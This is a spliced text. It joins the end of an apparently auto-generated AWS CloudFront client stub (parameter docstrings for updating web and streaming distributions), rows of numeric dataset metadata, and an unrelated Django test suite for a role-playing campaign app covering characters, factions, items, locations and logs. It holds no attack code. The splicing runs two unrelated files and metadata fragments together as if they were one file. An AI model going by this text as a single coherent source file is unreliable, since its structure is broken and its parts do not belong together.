If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name:
If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority:
ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution.
IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store.
If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod .
If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod :
vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate.
sni-only : CloudFront drops the connection with the browser without returning the object.
**If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors:
ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy
ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy
You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins:
OriginProtocolPolicyhttps-onlyOriginProtocolPolicy
OriginProtocolPolicymatch-viewerOriginProtocolPolicy
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
CertificateSource (string) --
Note
This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] .
Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content.
GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases.
RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country:
none : No geo restriction is enabled, meaning access to content is not restricted by client geo location.
blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content.
whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content.
Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items .
Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ).
The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country.
CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes.
(string) --
WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution.
AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide .
HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version.
For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI).
In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.'
IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution.
In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide .
If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true:
You enable IPv6 for the distribution
You're using alternate domain names in the URLs for your objects
For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide .
If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request.
:type Id: string
:param Id: [REQUIRED]
The distribution's id.
:type IfMatch: string
:param IfMatch: The value of the ETag header that you received when retrieving the distribution's configuration. For example: E2QWRUHAPOMQZL .
:rtype: dict
:return: {
'Distribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'InProgressInvalidationBatches': 123,
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
}
},
'ETag': 'string'
}
:returns:
self , which is the AWS account used to create the distribution.
An AWS account number.
"""
pass
def update_streaming_distribution(StreamingDistributionConfig=None, Id=None, IfMatch=None):
"""
Update a streaming distribution.
See also: AWS API Documentation
:example: response = client.update_streaming_distribution(
StreamingDistributionConfig={
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
},
Id='string',
IfMatch='string'
)
:type StreamingDistributionConfig: dict
:param StreamingDistributionConfig: [REQUIRED]
The streaming distribution's configuration information.
CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution.
DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront.
If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide .
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution.
Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
PriceClass (string) --A complex type that contains information about price class for this streaming distribution.
Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content.
:type Id: string
:param Id: [REQUIRED]
The streaming distribution's id.
:type IfMatch: string
:param IfMatch: The value of the ETag header that you received when retrieving the streaming distribution's configuration. For example: E2QWRUHAPOMQZL .
:rtype: dict
:return: {
'StreamingDistribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
}
},
'ETag': 'string'
}
:returns:
self , which is the AWS account used to create the distribution.
An AWS account number.
"""
pass
| 68.461109
| 813
| 0.5769
| 34,819
| 330,941
| 5.476435
| 0.026595
| 0.012922
| 0.021145
| 0.016194
| 0.969295
| 0.966515
| 0.963668
| 0.958969
| 0.956021
| 0.952398
| 0
| 0.010428
| 0.362796
| 330,941
| 4,833
| 814
| 68.475274
| 0.893815
| 0.936179
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
50c1b49da17e3998cd829361313fa015981b2fff
| 18,167
|
py
|
Python
|
campaign/test/test_views.py
|
devenney/reverie
|
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
|
[
"MIT"
] | null | null | null |
campaign/test/test_views.py
|
devenney/reverie
|
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
|
[
"MIT"
] | 47
|
2017-08-30T00:33:20.000Z
|
2018-03-09T07:38:39.000Z
|
campaign/test/test_views.py
|
devenney/reverie
|
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from django.template.defaultfilters import slugify
from django.test import TestCase
from django.urls import reverse
from campaign.models import Campaign, Character, Faction, Item, Location, Log
GM_USER = 'gm'
PLAYER_USER = 'player'
NOT_PLAYER_USER = 'not_player'
TEST_PASSWORD = 'password'
TEST_USERS = [GM_USER, PLAYER_USER, NOT_PLAYER_USER]
TEST_CAMPAIGN = {
'name': 'Public Campaign',
'gm_id': TEST_USERS.index(GM_USER),
'tagline': 'Test Tagline',
'description': 'Test Description',
'players': [TEST_USERS.index(PLAYER_USER)],
'public': True,
}
TEST_PLAYER_CHARACTER = {
'name': 'Test Player Character',
'tagline': 'Test Tagline',
'description': 'Test Description',
'player': TEST_USERS.index(PLAYER_USER),
'campaign_slug': 1,
'is_pc': True,
}
TEST_NON_PLAYER_CHARACTER = {
'name': 'Test Non-Player Character',
'tagline': 'Test Tagline',
'description': 'Test Description',
'player': TEST_USERS.index(PLAYER_USER),
'campaign_slug': 1,
'is_pc': False,
}
TEST_FACTION = {
'name': 'Test Faction',
'tagline': 'Test Tagline',
'description': 'Test Description',
'campaign_slug': 1,
}
TEST_ITEM = {
'name': 'Test Item',
'tagline': 'Test Tagline',
'description': 'Test Description',
'campaign_slug': 1,
}
TEST_LOCATION = {
'name': 'Test Location',
'tagline': 'Test Tagline',
'description': 'Test Description',
'campaign_slug': 1,
}
TEST_LOG = {
'name': 'Test Log',
'description': 'Test Description',
'date': '01/01/2001',
'campaign_slug': 1,
}
class CampaignViewTest(TestCase):
""" Test cases related to the Character view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
def test_create_campaign(self):
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Logout
self.client.logout()
def test_invalid_campaign_entry(self):
# Missing name
bad_campaign_form = {
'gm_id': TEST_USERS.index(GM_USER),
'tagline': 'Test Tagline',
'description': 'Test Description',
'players': [TEST_USERS.index(PLAYER_USER)],
'public': True,
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:campaign_entry'), bad_campaign_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
class CharacterViewTest(TestCase):
""" Test cases related to the Character view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Create Characters
response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_PLAYER_CHARACTER)
self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(TEST_PLAYER_CHARACTER.get("name"))}))
self.player_character = Character.objects.get(name = 'Test Player Character')
response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_NON_PLAYER_CHARACTER)
self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(TEST_NON_PLAYER_CHARACTER.get("name"))}))
self.non_player_character = Character.objects.get(name = 'Test Non-Player Character')
# Ensure character is visible
response = self.client.get(reverse('campaign:character_list', kwargs={'campaign_slug': slugify(self.campaign.name)}))
self.assertContains(response, 'Test Player Character', status_code=200)
self.assertContains(response, 'Test Non-Player Character', status_code=200)
# Logout
self.client.logout()
def test_invalid_character_entry(self):
# Missing name
bad_character_form = {
'tagline': 'Test tagline.',
'description': 'Test description',
'player': TEST_USERS.index(PLAYER_USER),
'campaign_slug': 1,
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_character_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
def test_gm_edit_character(self):
new_character = TEST_NON_PLAYER_CHARACTER
new_character['tagline'] = 'New tagline!'
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.non_player_character.name)}), new_character)
self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.non_player_character.name)}))
character = Character.objects.get(slug=slugify(self.non_player_character.name))
self.assertEqual(character.tagline, 'New tagline!')
self.client.logout()
def test_player_edit_character(self):
new_character = TEST_PLAYER_CHARACTER
new_character['tagline'] = 'New tagline!'
self.client.login(username=PLAYER_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)}), new_character)
self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)}))
character = Character.objects.get(slug=slugify(self.player_character.name))
self.assertEqual(character.tagline, 'New tagline!')
self.client.logout()
def test_not_player_edit_character(self):
new_character = TEST_PLAYER_CHARACTER
new_character['tagline'] = 'New tagline!'
self.client.login(username=NOT_PLAYER_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)}), new_character)
self.assertEqual(response.status_code, 403)
self.client.logout()
class FactionViewTest(TestCase):
""" Test cases related to the Faction view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Create Factions
response = self.client.post(reverse('campaign:faction_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_FACTION)
self.assertRedirects(response, reverse('campaign:faction_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(TEST_FACTION.get("name"))}))
self.faction = Faction.objects.get(name = 'Test Faction')
# Ensure faction is visible
response = self.client.get(reverse('campaign:faction_list', kwargs={'campaign_slug': slugify(self.campaign.name)}))
self.assertContains(response, 'Test Faction', status_code=200)
# Logout
self.client.logout()
def test_invalid_faction_entry(self):
# Missing name
bad_faction_form = {
'tagline': 'Test tagline.',
'description': 'Test description',
'campaign_slug': 1,
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:faction_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_faction_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
def test_edit_faction(self):
new_faction = TEST_FACTION
new_faction['tagline'] = 'New tagline!'
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:faction_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(self.faction.name)}), new_faction)
self.assertRedirects(response, reverse('campaign:faction_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(self.faction.name)}))
faction = Faction.objects.get(slug=slugify(self.faction.name))
self.assertEqual(faction.tagline, 'New tagline!')
self.client.logout()
class ItemViewTest(TestCase):
""" Test cases related to the Item view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Create Items
response = self.client.post(reverse('campaign:item_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_ITEM)
self.assertRedirects(response, reverse('campaign:item_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(TEST_ITEM.get("name"))}))
self.item = Item.objects.get(name = 'Test Item')
# Ensure item is visible
response = self.client.get(reverse('campaign:item_list', kwargs={'campaign_slug': slugify(self.campaign.name)}))
self.assertContains(response, 'Test Item', status_code=200)
# Logout
self.client.logout()
def test_invalid_item_entry(self):
# Missing name
bad_item_form = {
'tagline': 'Test tagline.',
'description': 'Test description',
'campaign_slug': 1,
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:item_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_item_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
def test_edit_item(self):
new_item = TEST_ITEM
new_item['tagline'] = 'New tagline!'
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:item_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(self.item.name)}), new_item)
self.assertRedirects(response, reverse('campaign:item_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(self.item.name)}))
item = Item.objects.get(slug=slugify(self.item.name))
self.assertEqual(item.tagline, 'New tagline!')
self.client.logout()
class LocationViewTest(TestCase):
""" Test cases related to the Location view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Create Locations
response = self.client.post(reverse('campaign:location_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_LOCATION)
self.assertRedirects(response, reverse('campaign:location_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(TEST_LOCATION.get("name"))}))
self.location = Location.objects.get(name = 'Test Location')
# Ensure location is visible
response = self.client.get(reverse('campaign:location_list', kwargs={'campaign_slug': slugify(self.campaign.name)}))
self.assertContains(response, 'Test Location', status_code=200)
# Logout
self.client.logout()
def test_invalid_location_entry(self):
# Missing name
bad_location_form = {
'tagline': 'Test tagline.',
'description': 'Test description',
'campaign_slug': 1,
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:location_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_location_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
def test_edit_location(self):
new_location = TEST_LOCATION
new_location['tagline'] = 'New tagline!'
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:location_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(self.location.name)}), new_location)
self.assertRedirects(response, reverse('campaign:location_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(self.location.name)}))
location = Location.objects.get(slug=slugify(self.location.name))
self.assertEqual(location.tagline, 'New tagline!')
self.client.logout()
class LogViewTest(TestCase):
""" Test cases related to the Log view. """
def setUp(self):
# Create Users
for idx, user in enumerate(TEST_USERS):
User.objects.create_user(
id=TEST_USERS.index(user),
password=TEST_PASSWORD,
username=user,
)
self.client.login(username=GM_USER, password=TEST_PASSWORD)
# Create Campaigns
response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN)
self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))}))
self.campaign = Campaign.objects.get(name = 'Public Campaign')
# Create Logs
response = self.client.post(reverse('campaign:log_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_LOG)
self.assertRedirects(response, reverse('campaign:log_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'log_slug': slugify(TEST_LOG.get("name"))}))
self.log = Log.objects.get(name = 'Test Log')
# Ensure log is visible
response = self.client.get(reverse('campaign:log_list', kwargs={'campaign_slug': slugify(self.campaign.name)}))
self.assertContains(response, 'Test Log', status_code=200)
# Logout
self.client.logout()
def test_invalid_log_entry(self):
# Missing description
bad_log_form = {
'name': 'Test Log',
'description': '',
}
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:log_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_log_form)
self.assertEqual(response.status_code, 200)
self.client.logout()
def test_edit_log(self):
new_log = TEST_LOG
new_log['description'] = 'New description!'
self.client.login(username=GM_USER, password=TEST_PASSWORD)
response = self.client.post(reverse('campaign:log_edit', kwargs={'campaign_slug': slugify(self.campaign.slug), 'log_slug': slugify(self.log.slug)}), new_log)
self.assertRedirects(response, reverse('campaign:log_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'log_slug': slugify(self.log.name)}))
log = Log.objects.get(slug=slugify(self.log.name))
self.assertEqual(log.description, 'New description!')
self.client.logout()
| 38.901499
| 200
| 0.673034
